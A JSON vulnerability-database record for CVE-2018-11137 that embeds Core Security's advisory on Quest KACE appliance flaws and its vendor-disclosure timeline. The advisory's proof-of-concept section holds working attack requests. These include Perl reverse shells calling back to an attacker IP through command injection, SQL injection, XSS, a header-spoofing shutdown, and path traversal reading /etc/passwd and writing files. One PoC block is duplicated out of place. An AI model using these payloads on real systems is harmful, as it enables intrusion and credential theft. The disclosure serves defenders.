"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-11137"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Core Security Technologies, Leandro Barragan, Guido Leo",
"sources": [
{
"db": "PACKETSTORM",
"id": "148005"
}
],
"trust": 0.1
},
"cve": "CVE-2018-11137",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2018-11137",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "CNVD-2018-15642",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.5,
"baseSeverity": "Medium",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-11137",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-11137",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2018-15642",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201805-1217",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2018-11137",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15642"
},
{
"db": "VULMON",
"id": "CVE-2018-11137"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005410"
},
{
"db": "NVD",
"id": "CVE-2018-11137"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1217"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The \u0027checksum\u0027 parameter of the \u0027/common/download_attachment.php\u0027 script in the Quest KACE System Management Appliance 8.0.318 can be abused to read arbitrary files with \u0027www\u0027 privileges via Directory Traversal. No administrator privileges are needed to execute this script. Quest KACE Systems Management Appliance Contains a path traversal vulnerability.Information may be obtained. QuestKACESystemManagementAppliance is an IT asset management device from QuestSoftware, USA. A path traversal vulnerability exists in the QuestKACESystemManagementAppliance 8.0.318 release. *Advisory Information*\n\nTitle: Quest KACE System Management Appliance Multiple Vulnerabilities\nAdvisory ID: CORE-2018-0004\nAdvisory URL:\nhttp://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities\nDate published: 2018-05-31\nDate of last update: 2018-05-22\nVendors contacted: Quest Software Inc. \nRelease mode: Forced release\n\n2. *Vulnerability Information*\n\nClass: Improper Neutralization of Special Elements used in an OS Command\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\n[CWE-78], Deserialization of Untrusted Data [CWE-502], Improper Privilege\nManagement [CWE-269], Improper Privilege Management [CWE-269], Improper\nAuthorization [CWE-285], Improper Neutralization of Special Elements used\nin an SQL Command [CWE-89], Improper Neutralization of Special Elements\nused in an SQL Command [CWE-89], Improper Neutralization of Input During\nWeb Page Generation [CWE-79], External Control of File Name or Path\n[CWE-73], External Control of File Name or Path [CWE-73]\nImpact: Code execution\nRemotely Exploitable: Yes\nLocally Exploitable: Yes\nCVE Name: CVE-2018-11138, CVE-2018-11139, CVE-2018-11135, CVE-2018-11134,\nCVE-2018-11132, CVE-2018-11142, CVE-2018-11136, CVE-2018-11140,\nCVE-2018-11133,\nCVE-2018-11137, CVE-2018-11141\n\n3. *Vulnerability Description*\n\n\u003eFrom Quest KACE\u0027s website:\n\n\"The KACE Systems Management Appliance [1] provides\nyour growing organization with comprehensive management of network-connected\ndevices, including servers, PCs, Macs, Chromebooks, tablets, printers,\nstorage, networking gear and the Internet of Things (IoT). KACE can fulfill\nall of your organization\u0027s systems management needs, from initial deployment\nto ongoing management and retirement.\"\n\nMultiple vulnerabilities were found in the Quest KACE System Management\nVirtual Appliance that would allow a remote attacker to gain command\nexecution as root. We present three vectors to achieve this, including\none that can be exploited as an unauthenticated user. \n\nAdditional web application vulnerabilities were found in the web console\nthat is bundled with the product. These vulnerabilities are detailed in\nsection 7. \n\nNote: This advisory has limited details on the vulnerabilities because\nduring the attempted coordinated disclosure process, Quest advised us not\nto distribute our original findings to the public or else they would\ntake legal action. Quest\u0027s definition of \"responsible disclosure\" can be\nfound at\nhttps://support.quest.com/essentials/reporting-security-vulnerability. \n\nCoreLabs has been publishing security advisories since 1997 and believes\nin coordinated disclosure and good faith collaboration with software vendors\nbefore disclosure to help ensure that a fix or workaround solution is ready\nand available when the vulnerability details are publicized. We believe\nthat providing technical details about each finding is necessary to provide\nusers and organizations with enough information to understand the\nimplications\nof the vulnerabilities against their environment and, most importantly, to\nprioritize the remediation activities aiming at mitigating risk. \n\nWe regret Quest\u0027s posture on disclosure during the whole process (detailed\nin the Report Timeline section) and the lack of a possibility of engaging\ninto a coordinated publication date, something we achieve (and have\nachieved) with many vendors as part of our coordinated disclosure practices. \n\n4. *Vulnerable Packages*\n\n. \n\n5. *Vendor Information, Solutions and Workarounds*\n\nQuest reports that it has released the security vulnerability patch\nSEC2018_20180410 to address the reported vulnerabilities. \nPatch can be download at\nhttps://support.quest.com/download-install-detail/6086148. \n\nFor more details, Quest published the following Security Note:\nhttps://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-\n\n6. *Credits*\n\nThese vulnerabilities were discovered and researched by Leandro Barragan\nand Guido Leo from Core Security Consulting Services. The publication of\nthis advisory was coordinated by Leandro Cuozzo from Core Advisories Team. \n\n7. *Technical Description / Proof of Concept Code*\n\nQuest KACE SMA ships with a web console that provides administrators and\nusers with several features. Multiple vulnerabilities were found in the\ncontext of this console, both from an authenticated and unauthenticated\nperspective. \n\nSection 7.1 describes how an unauthenticated attacker could gain command\nexecution on the system as the web server user. \n\nVulnerabilities described in 7.2 and 7.3 could also be abused to gain code\nexecution but would require the attacker to have a valid authentication\ntoken. \n\nIn addition, issues found in the Sudo Server module presented in 7.4 and\n7.5 would allow the attacker to elevate his privileges from the web server\nuser to root, effectively obtaining full control of the device. \n\nAdditional web application vulnerabilities were found in the console, such\nas insufficient authorization for critical functions, which would allow an\nanonymous attacker to reconfigure the appliance (7.6), SQL injection\nvulnerabilities (7.7, 7,8), a cross-site scripting issue (7.9), and path\ntraversal vulnerabilities, which would allow an attacker to read, write and\ndelete arbitrary files (7.9, 7.10, 7.11). \n\n7.1. *Unauthenticated command injection*\n\n[CVE-2018-11138]\nThe \u0027/common/download_agent_installer.php\u0027 script is accessible to anonymous\nusers in order to download an agent for a specific platform. This behavior\ncan be abused to execute arbitrary commands on the system. \n\nThe script receives the following parameters via the GET method:\n\n. platform: Indicates the platform in which the agent is going to be\ninstalled\n. serv: SHA256 hash of a fixed value that depends of each appliance\n. orgid: Organization ID\n. version: Version number of the agent\n\nThe last two conditions are simple to meet. The Agent versions are publicly\navailable within the Quest KACE site, but even if they were not, we found\nthat the Organization ID parameter is vulnerable to a time based SQL\ninjection\n(refer to issue 7.7). \nThis would make it possible to obtain the agent version by querying the\ntable \u0027CLIENT_DISTRIBUTION\u0027 and fetching the contents of the \u0027VERSION\u0027\ncolumn. The Organization ID is 1 by default, but could be obtained in the\nsame way as the Agent version by querying the table \u0027ORGANIZATION\u0027 and\nthe column \u0027ID\u0027. \n\nAs stated above, the application uses the Organization ID and Agent\nversion parameters to execute commands. This means we need to find a way\nto append system commands within the Organization ID, without breaking the\nSQL query. If we use the comment symbol (#), we can append anything we want\nwithout affecting the result of the query. \n\nPreparing payload:\n\n/-----\n- platform = windows\n- serv = ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c\n- orgid = 1#;perl -e \u0027use\nSocket;$i=\"[AttackerIP]\";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e\u0026S\");open(STDOUT,\"\u003e\u0026S\");open(STDERR,\"\u003e\u0026S\");exec(\"/bin/bash\n-i\");};\u0027;\n- version = 8.0.152 (last agent version available for windows)\n-----/\n\nThe following proof of concept executes a reverse shell:\n\n/-----\nGET\n/common/download_agent_installer.php?platform=windows\u0026serv=ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c\u0026orgid=1%23%3bperl+-e+\u0027use+Socket%3b$i%3d\"[AttackerIP]\"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e%26S\")%3bopen(STDOUT,\"\u003e%26S\")%3bopen(STDERR,\"\u003e%26S\")%3bexec(\"/bin/sh+-i\")%3b}%3b\u0027%3b\u0026version=8.0.152\nHTTP/1.1\nHost: Server\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection: close\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\n-----/\n\n/-----\n$ nc -lvp 8080\nListening on [0.0.0.0] (family 0, port 8080)\nConnection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2,\nsport 20050)\nsh: can\u0027t access tty; job control turned off\n$ id\nuid=80(www) gid=80(www) groups=80(www)\n-----/\n\n7.2. *Authenticated command injection*\n\n[CVE-2018-11139]\nThe \u0027/common/ajax_email_connection_test.php\u0027 script used to test the\nconfigured\nSMTP server is accessible by any authenticated user and can be abused to\nexecute arbitrary commands on the system. This script is vulnerable to\ncommand injection via the unsanitized user input \u0027TEST_SERVER\u0027 sent to the\nscript via POST method. \n\nThe following proof of concept executes a reverse shell:\n\n/-----\nPOST /common/ajax_email_connection_test.php HTTP/1.1\nHost: [ServerIP]\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nContent-Length: 416\nCookie: [Cookie]\nConnection: close\n\nTEST_SERVER=test;perl+-e+\u0027use+Socket%3b$i%3d\"[AttackerIP]\"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e%26S\")%3bopen(STDOUT,\"\u003e%26S\")%3bopen(STDERR,\"\u003e%26S\")%3bexec(\"/bin/sh+-i\")%3b}%3b\u0027;\u0026TEST_PORT=587\u0026TEST_USERNAME=eaea@eaea.com\u0026TEST_PASSWORD=1234\u0026TEST_OLD_PASSWORD=\u0026QUEUE_ID=1\u0026TEST_TO_EMAIL=eaea@eaea.com\u0026ACTION=TEST_CONNECTION_SMTP\n-----/\n\n/-----\n$ nc -lvp 8080\nListening on [0.0.0.0] (family 0, port 8080)\nConnection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2,\nsport 20050)\nsh: can\u0027t access tty; job control turned off\n$ id\nuid=80(www) gid=80(www) groups=80(www)\n-----/\n\n7.3. *PHP Object Injection leading to arbitrary command execution*\n\n[CVE-2018-11135]\nAn authenticated user could abuse a deserialization call on the script\n\u0027/adminui/error_details.php\u0027 to inject arbitrary PHP objects. \n\nTo exploit this issue, the parameter \u0027ERROR_MESSAGES\u0027 needs to be an array\nand meet some specific conditions in order to successfully exploit the\nissue. \n\n7.4. *Privilege escalation via password change in Sudo Server*\n\n[CVE-2018-11134]\nIn order to perform actions that requires higher privileges, the application\nrelies on a message queue managed that runs with root privileges and only\nallows a set of commands. \n\nOne of the available commands allows to change any user\u0027s password\n(including root). \n\nAssuming we are able to run commands in the server, we could abuse this\nfeature by changing the password of the \u0027kace_support\u0027 account, which\ncomes disabled by default but has full sudo privileges. \n\n7.5. *Privilege escalation via command injection in Sudo Server*\n\n[CVE-2018-11132]\nAs mentioned in the issue [7.4], in order to perform actions that require\nhigher privileges, the application relies on a message queue that runs\ndaemonized with root privileges and only allows a set of commands to be\nexecuted. \n\nA command injection vulnerability exists within this message queue which\nallows us to append arbitrary commands that will be run as root. \n\n7.6. *Insufficient Authorization for critical function*\n\n[CVE-2018-11142]\n\u0027systemui/settings_network.php\u0027 and \u0027systemui/settings_patching.php\u0027\nscripts are accessible only from localhost. This restriction can be bypassed\nby modifying the \u0027Host\u0027 and \u0027X_Forwarded_For\u0027 HTTP headers. \n\nThe following proof of concept abuses this vulnerability to shutdown the\nserver as an anonymous user:\n\n/-----\nPOST /systemui/settings_network.php HTTP/1.1\nHost: localhost\nX-Forwarded-For: ::1\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://[ServerIp]/systemui/settings_network.php\nContent-Type: multipart/form-data;\nboundary=---------------------------5642543667001619951434940129\nContent-Length: 3418\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n-----------------------------5642543667001619951434940129\nContent-Disposition: form-data; name=\"CSRF_TOKEN\"\n-----------------------------5642543667001619951434940129\nContent-Disposition: form-data; name=\"$shutdown\"\nDoIt!\nContent-Disposition: form-data; name=\"save\"\nSave\n-----------------------------5642543667001619951434940129--\n-----/\n\n7.7. *Unauthenticated SQL Injection in download_agent_installer.php*\n\n[CVE-2018-11136]\nThe \u0027orgID\u0027 parameter received by the \u0027/common/download_agent_installer.php\u0027\nscript is not sanitized, leading to SQL injection. In particular, a blind\ntime based type. \n\nThe following proof of concept induces a time delay:\n\n/-----\nhttp://[ServerIP]/common/download_agent_installer.php?platform=windows\u0026serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f\u0026orgid=1\nAND SLEEP(10)%23;\u0026version=8.0.152\n-----/\n\n7.8. *SQL Injection in run_report.php*\n\n[CVE-2018-11140]\nThe \u0027reportID\u0027 parameter received by the \u0027/common/run_report.php\u0027 script\nis not sanitized, leading to SQL injection. In particular, an error based\ntype. \n\nThe following proof of concept retrieves the current database name:\n\n/-----\nPOST /common/run_report.php HTTP/1.1\nContent-Length: 161\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nHost: [ServerIP]\nAccept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8\nConnection: close\nReferer: http://[ServerIP]/adminui/analysis_report_list.php?CATEGORY_ID=\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nCookie: [Cookie]\n\ndate=1516135247598\u0026reportId=-3161+UNION+ALL+SELECT+CONCAT(0x7170706a71,IFNULL(CAST(DATABASE()+AS+CHAR),0x20),0x716a707171),NULL--+LhEx\u0026reportName=\u0026format=pdf\n-----/\n\n/-----\nHTTP/1.1 200 OK\nDate: Thu, 08 Feb 2018 21:50:21 GMT\nServer: Apache\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nCache-Control: no-store, no-cache, must-revalidate, post-check=0,\npre-check=0\nPragma: no-cache\nVary: Accept-Encoding\nAccess-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key,\nx-kace-auth-signature, accept, origin, content-type\nAccess-Control-Allow-Origin: *\nAccess-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS\nX-KACE-Appliance: K1000\nX-KACE-Host: [ServerIP]\nX-KACE-Version: 8.0.318\nX-KBOX-WebServer: [ServerIP]\nX-KBOX-Version: 8.0.318\nX-KACE-WebServer: [ServerIP]\nX-UA-Compatible: IE=9,EDGE\nCache-Control: private, no-cache, no-store, proxy-revalidate, no-transform\nContent-Length: 3548\nConnection: close\nContent-Type: text/html; charset=utf-8\n\n[...SNIPPED...]\n\u003cscript type=\"text/javascript\"\nsrc=\"/common/js/vendor/html5.js?BUILD=318\" /\u003e\u003c/script\u003e\n\u003c![endif]--\u003e\u003ctitle\u003eReport Queued: qppjqORG1qjpqq\u003c/title\u003e\u003cmeta\nhttp-equiv=\u0027refresh\u0027\n[...SNIPPED...]\n-----/\n\n7.9. *Unauthenticated Cross Site Scriting in run_cross_report.php*\n\n[CVE-2018-11133]\nThe \u0027fmt\u0027 parameter of the \u0027/common/run_cross_report.php\u0027 script is\nvulnerable to cross-site scripting. \n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nhttp://[ServerIP]/common/run_cross_report.php?uniqueId=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952\n-----/\n\n7.10. The following proof\nof concept reads the \u0027/etc/passwd\u0027 file. \n\nIt is worth noting that there are several interesting files that can be\nread with \u0027www\u0027 privileges, such as all the files located in\n\u0027/kbox/bin/koneas/keys/\u0027 and \u0027/kbox/kboxwww/include/globals.inc\u0027,\nwhich contain plaintext passwords. \n\n/-----\nhttp://[ServerIP]/common/run_cross_report.php?uniqueId=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952\n-----/\n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nGET\n/common/download_attachment.php?checksum=/../../../../../../../../../../../etc/passwd\u0026filename=\nHTTP/1.1\nHost: [ServerIP]\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nCookie: [Cookie]\nConnection: close\nUpgrade-Insecure-Requests: 1\n\nHTTP/1.1 200 OK\nDate: Thu, 18 Jan 2018 17:18:19 GMT\nServer: Apache\nCache-Control: must-revalidate, post-check=0, pre-check=0\nExpires: -1\nPragma: public\nContent-Disposition: attachment; filename=\"\"\nContent-Transfer-Encoding: Binary\nContent-Description: K1000 attachment\nContent-Length: 2400\nAccess-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key,\nx-kace-auth-signature, accept, origin, content-type\nAccess-Control-Allow-Origin: *\nAccess-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS\nX-KACE-Appliance: K1000\nX-KACE-Host: k10000. \nX-KACE-Version: 8.0.318\nX-KBOX-WebServer: k10000. \nX-KBOX-Version: 8.0.318\nX-KACE-WebServer: k10000. \nX-UA-Compatible: IE=9,EDGE\nCache-Control: private, no-cache, no-store, proxy-revalidate, no-transform\nConnection: close\nContent-Type: application/octet-stream\n\n# $FreeBSD: releng/11.0/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $\n#\nroot:*:0:0:Charlie \u0026:/root:/bin/csh\ndaemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin\noperator:*:2:5:System \u0026:/:/usr/sbin/nologin\nbin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin\ntty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin[...SNIPPED...]\n-----/\n\n7.11. The following proof of concept creates a file located at\n\u0027/kbox/kboxwww/resources/TestWrite\u0027 with the content \u0027Sarasa\u0027 (base64\nencoded). \nFiles can be at any location where the \u0027www\u0027 user has write permissions. \n\nFile deletion could be abused to delete\n\u0027/kbox/kboxwww/systemui/reports/setup_completed.log\u0027 file. This file\u0027s\nexistence defines if the appliance setup wizard is shown or not. \n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nPOST /adminui/advisory.php?ID=10 HTTP/1.1\nHost: [ServerIP]\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://[ServerIP]/adminui/advisory.php?ID=10\nContent-Type: multipart/form-data;\nboundary=---------------------------2671551246366368501556269100\nContent-Length: 1705\nCookie: [Cookie]\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; name=\"CSRF_TOKEN\"\n\n99c2addf067719d6fc3ae32ded351f000af8efdd091f162baa2a34516cefecc741cb13a69c80554a9ba32908d1c683102d3455eac39bcafc8854f46a04b2044e\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; name=\"IMAGES_JSON\"\n\n{\"/../../../resources/TestWrite\":\"aaaaaa,VGVzdENvbnRlbnQ=\"}\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; name=\"FARRAY[ID]\"\n[...SNIPPED...]\n-----/\n\nTaking advantage of 7.2 and 7.4 we are able to verify the file creation:\n\n/-----\n[root@k10000 /kbox/kboxwww/resources]# ls -lha\ntotal 32\ndrwxr-xr-x 2 www wheel 512B Feb 9 20:40 . \ndrwxr-xr-x 23 root wheel 512B Nov 14 18:29 .. \n-rw-r--r-- 1 www wheel 11B Feb 9 20:40 TestWrite\n-----/\n\n8. *Report Timeline*\n2018-02-26: Core Security (Core) sent an initial notification to Quest\nSoftware Inc. (Quest) via web form. \n2018-03-05: Quest Support confirmed the receipt and requested additional\ninformation. \n2018-03-12: Core Security sent a draft advisory including a technical\ndescription. \n2018-03-16: Quest Support asked for the CVE-IDs. \n2018-03-16: Core Security answered saying that the CVE-IDs are required\nonce the vendor verifies the vulnerabilities. Additionally, Core Security\nrequested a confirmation about the reported vulnerabilities and a tentative\ntimescale to fix them. Finally, Core Security requested that Quest use\nCore\u0027s advisories-publication email address as the official communication\nhannel also copying the researchers behind this discovery. \n2018-03-16: Quest Support thanked Core\u0027s reply and stated it will be in\ntouch during the process. \n2018-03-20: Quest Support informed that they had not yet received any\nupdates from the engineering team and had requested one. \n2018-03-21: Quest Support requested information about the KACE version\nused for reporting the issues and also Core\u0027s company name and information. \n2018-03-21: Core replied with the affected version (that was included in\nthe original draft advisory) and a link to the Core company website and\nthe list of previous security advisories. \n2018-03-21: Quest Support acknowledged the information provided. \n2018-03-26: Quest\u0027s KACE product manager (PM) thanked Core for making it\naware of the security issues found and the level of thoroughness and details\nprovided. Quest specified it had fixes already in place for some of the\nissues. Quest\u0027s KACE PM asked for a conference call in order to understand\nmore about Core\u0027s offerings for future engagements. Finally, Quest\u0027s KACE\nPM notified the work done by Core is in breach of its license agreement,\nand requested Core not to distribute the findings to the public, otherwise\nuest would take legal action. \n2018-04-13: Quest\u0027s KACE PM sent a follow up email and informed that it\nmade a hotfix to patch the reported vulnerabilities. Quest also requested\na call meeting to understand future opportunities based on the Core\u0027s\ncompany capabilities. Finally, Quest asked for information about the\nresearcher that found the vulnerabilities and a link of Core\u0027s choosing\nin order to be included in Quest\u0027s Acknowledgment page\n(https://support.quest.com/essentials/vulnerability-reporting-acknowledgements). \n2018-04-16: Core answered email from 2018-03-26 stating the company is\nfollowing standard practices with regards to coordinated vulnerability\ndisclosure, and also sent detailed technical information about our findings\nat Quest\u0027s request. Core also mentioned Quest seems to be well versed in\nthe disclosure process and expects vendors to coordinate with it prior to\npublication via Quest\u0027s vulnerability reporting process, and that Quest\u0027s\nlegal threat appears to be in direct contradiction to the disclosure\nprocess that they encourage on their website. Finally, Core asked about\nQuest\u0027s intention to work collaboratively to address these vulnerabilities\nand to follow industry standard disclosure processes that involves\npublication of the vulnerabilities. \n2018-04-17: Quest\u0027s KACE PM replied saying it is willing to collaborate\nand is looking forward to having a conversation over the phone in order to\ncontinue the next steps in its vulnerability process (forwarded email from\n2018-04-13). \n2018-04-17: Core thanked the answer and stated the willingness of keeping\nwritten communications between parties in order to better document the\nprocess and communicated the next steps of the process including: 1. Testing\nthe fix (if vendor agrees), 2. Get CVE-IDs, 3. Get a Vendor\u0027s link to be\nincluded in the advisory and finally 4. Send final advisory version to\nvendor and coordinate publication date together. With regards to Quest\u0027s\nrequests, Core provided the researchers names and URL of the advisory when\nit will be published. Finally, Core stated that the request for other Core\ncompany services could be forwarded to the Core services team if needed\n(and asked the right contact at Quest) but our intention is to keep that\nservices request separate from the coordinated disclosure process. \n2018-04-18: Quest Support informed that they had publicly made available\npatches for its customers and unilaterally closed the case. \n2018-05-31: Advisory CORE-2018-0004 published. \n\n9. *References*\n\n[1] https://www.quest.com/products/kace-systems-management-appliance/\n\n10. *About CoreLabs*\n\nCoreLabs, the research center of Core Security, is charged with anticipating\nthe future needs and requirements for information security technologies. \nWe conduct our research in several important areas of computer security\nincluding system vulnerabilities, cyber-attack planning and simulation,\nsource code auditing, and cryptography. Our results include problem\nformalization, identification of vulnerabilities, novel solutions and\nprototypes for new technologies. CoreLabs regularly publishes security\nadvisories, technical papers, project information and shared software\ntools for public use at:\nhttp://corelabs.coresecurity.com. \n\n11. *About Core Security*\n\nCore Security provides companies with the security insight they need to\nknow who, how, and what is vulnerable in their organization. The company\u0027s\nthreat-aware, identity amp; access, network security, and vulnerability\nmanagement solutions provide actionable insight and context needed to\nmanage security risks across the enterprise. This shared insight gives\ncustomers a comprehensive view of their security posture to make better\nsecurity remediation decisions. Better insight allows organizations to\nprioritize their efforts to protect critical assets, take action sooner\nto mitigate access risk, and react faster if a breach does occur. \n\nCore Security is headquartered in the USA with offices and operations in\nSouth America, Europe, Middle East and Asia. To learn more, contact Core\nSecurity at (678) 304-4500 or info@coresecurity.com\n\n12. *Disclaimer*\n\nThe contents of this advisory are copyright (c) 2018 Core Security and (c)\n2018 CoreLabs, and are licensed under a Creative Commons Attribution\nNon-Commercial Share-Alike 3.0 (United States) License:\nhttp://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n13. *PGP/GPG Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nadvisories team, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-11137"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005410"
},
{
"db": "CNVD",
"id": "CNVD-2018-15642"
},
{
"db": "VULMON",
"id": "CVE-2018-11137"
},
{
"db": "PACKETSTORM",
"id": "148005"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-11137",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005410",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2018-15642",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1217",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "148005",
"trust": 0.2
},
{
"db": "VULMON",
"id": "CVE-2018-11137",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15642"
},
{
"db": "VULMON",
"id": "CVE-2018-11137"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005410"
},
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "NVD",
"id": "CVE-2018-11137"
},
{
"db": "CNNVD",
